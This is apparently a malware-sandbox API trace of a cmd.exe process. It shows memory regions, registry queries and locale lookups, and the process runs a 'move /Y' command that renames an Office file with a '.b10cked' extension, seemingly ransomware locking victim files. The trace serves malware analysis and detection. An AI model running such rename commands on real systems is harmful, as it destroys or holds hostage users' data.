"CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24068 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24069 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24070 start_va = 
0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24071 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 24072 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24073 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24074 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24075 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24076 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24077 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24148 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24149 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24150 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24151 start_va = 0x2f0000 end_va = 
0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 24152 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 24153 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24154 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24155 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24156 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24157 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24158 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24159 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24160 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = 
"\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24161 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24162 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 24163 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24164 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24165 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24166 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 24167 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 24168 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 24169 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 24170 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 24171 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 412 os_tid = 0xe60 [0175.279] GetSystemTimeAsFileTime (in: 
lpSystemTimeAsFileTime=0x20faf4 | out: lpSystemTimeAsFileTime=0x20faf4*(dwLowDateTime=0x9e5ffb00, dwHighDateTime=0x1d440a9)) [0175.279] GetCurrentProcessId () returned 0xd7c [0175.279] GetCurrentThreadId () returned 0xe60 [0175.279] GetTickCount () returned 0x32f2a [0175.279] QueryPerformanceCounter (in: lpPerformanceCount=0x20faec | out: lpPerformanceCount=0x20faec*=23206827698) returned 1 [0175.280] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0175.280] __set_app_type (_Type=0x1) [0175.280] __p__fmode () returned 0x76b331f4 [0175.280] __p__commode () returned 0x76b331fc [0175.280] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0175.280] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0175.280] GetCurrentThreadId () returned 0xe60 [0175.280] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe60) returned 0x38 [0175.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0175.280] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0175.280] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.280] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0175.280] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fa84 | out: phkResult=0x20fa84*=0x0) returned 0x2 [0175.280] VirtualQuery (in: lpAddress=0x20fabb, lpBuffer=0x20fa54, dwLength=0x1c | out: lpBuffer=0x20fa54*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.280] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fa54, dwLength=0x1c | out: lpBuffer=0x20fa54*(BaseAddress=0x110000, 
AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0175.280] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fa54, dwLength=0x1c | out: lpBuffer=0x20fa54*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0175.281] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fa54, dwLength=0x1c | out: lpBuffer=0x20fa54*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.281] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fa54, dwLength=0x1c | out: lpBuffer=0x20fa54*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0175.281] GetConsoleOutputCP () returned 0x1b5 [0175.281] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.281] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0175.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0175.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.281] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0175.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0175.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.281] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0175.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.281] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0175.282] GetEnvironmentStringsW () returned 0x300210* [0175.282] FreeEnvironmentStringsW (penv=0x300210) returned 1 [0175.282] GetEnvironmentStringsW () returned 0x300210* [0175.282] 
FreeEnvironmentStringsW (penv=0x300210) returned 1 [0175.282] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e9f4 | out: phkResult=0x20e9f4*=0x40) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x0, lpData=0x20ea00*=0xa0, lpcbData=0x20e9f8*=0x1000) returned 0x2 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x1, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x0, lpData=0x20ea00*=0x1, lpcbData=0x20e9f8*=0x1000) returned 0x2 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x0, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x40, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x40, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x0, lpData=0x20ea00*=0x40, lpcbData=0x20e9f8*=0x1000) returned 0x2 [0175.282] RegCloseKey (hKey=0x40) returned 0x0 [0175.282] 
RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e9f4 | out: phkResult=0x20e9f4*=0x40) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x0, lpData=0x20ea00*=0x40, lpcbData=0x20e9f8*=0x1000) returned 0x2 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x1, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x0, lpData=0x20ea00*=0x1, lpcbData=0x20e9f8*=0x1000) returned 0x2 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x0, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.283] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x9, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.283] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x9, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.283] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x0, lpData=0x20ea00*=0x9, lpcbData=0x20e9f8*=0x1000) returned 0x2 [0175.283] RegCloseKey (hKey=0x40) returned 0x0 [0175.283] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638b [0175.283] srand 
(_Seed=0x5b88638b) [0175.283] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked\"" [0175.283] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked\"" [0175.283] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.283] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0175.283] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0175.283] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0175.283] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.283] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0175.283] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0175.283] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0175.283] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0175.283] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0175.283] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0175.283] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0175.283] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0175.284] 
SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0175.284] GetEnvironmentStringsW () returned 0x302360* [0175.284] FreeEnvironmentStringsW (penv=0x302360) returned 1 [0175.284] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.284] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.284] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0175.284] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0175.284] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0175.284] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0175.284] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0175.284] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0175.284] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0175.284] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0175.284] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f7c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.284] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f7c0, lpFilePart=0x20f7bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f7bc*="Desktop") returned 0x18 [0175.284] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0175.284] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f53c | out: lpFindFileData=0x20f53c) returned 0x3009f0 [0175.284] FindClose (in: hFindFile=0x3009f0 | out: hFindFile=0x3009f0) returned 1 [0175.284] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f53c | out: lpFindFileData=0x20f53c) returned 0x3009f0 [0175.285] FindClose (in: hFindFile=0x3009f0 | out: hFindFile=0x3009f0) returned 1 [0175.285] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f53c | out: lpFindFileData=0x20f53c) returned 0x3009f0 [0175.285] FindClose (in: hFindFile=0x3009f0 | out: hFindFile=0x3009f0) returned 1 [0175.285] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0175.285] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0175.285] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0175.285] GetEnvironmentStringsW () returned 0x300210* [0175.285] FreeEnvironmentStringsW (penv=0x300210) returned 1 [0175.285] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.285] GetConsoleOutputCP () returned 0x1b5 [0175.286] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.286] GetUserDefaultLCID () returned 0x409 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f900, cchData=128 | out: lpLCData="0") returned 2 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f900, cchData=128 | out: lpLCData="0") returned 2 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f900, cchData=128 | out: lpLCData="1") returned 2 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 
[0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0175.287] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0175.288] GetConsoleTitleW (in: lpConsoleTitle=0x2f0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.288] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0175.288] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0175.288] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0175.288] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0175.289] _wcsicmp (_String1="move", _String2=")") returned 68 [0175.289] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0175.289] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0175.289] _wcsicmp (_String1="IF", _String2="move") returned -4 [0175.289] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0175.289] _wcsicmp (_String1="REM", _String2="move") returned 5 [0175.289] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0175.293] GetConsoleTitleW (in: lpConsoleTitle=0x20f5f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.293] _wcsicmp (_String1="move", _String2="DIR") 
returned 9 [0175.293] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0175.293] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0175.293] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0175.293] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0175.293] _wcsicmp (_String1="move", _String2="CD") returned 10 [0175.293] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0175.293] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0175.293] _wcsicmp (_String1="move", _String2="REN") returned -5 [0175.293] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0175.293] _wcsicmp (_String1="move", _String2="SET") returned -6 [0175.294] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0175.294] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0175.294] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0175.294] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0175.294] _wcsicmp (_String1="move", _String2="MD") returned 11 [0175.294] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0175.294] _wcsicmp (_String1="move", _String2="RD") returned -5 [0175.294] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0175.294] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0175.294] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0175.294] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0175.294] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0175.294] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0175.294] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0175.294] _wcsicmp (_String1="move", _String2="VER") returned -9 [0175.294] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0175.294] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0175.294] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0175.294] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0175.294] _wcsicmp (_String1="move", 
_String2="TITLE") returned -7 [0175.294] _wcsicmp (_String1="move", _String2="START") returned -6 [0175.294] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0175.294] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0175.294] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0175.295] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.295] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.295] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f3b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f3ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f3ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 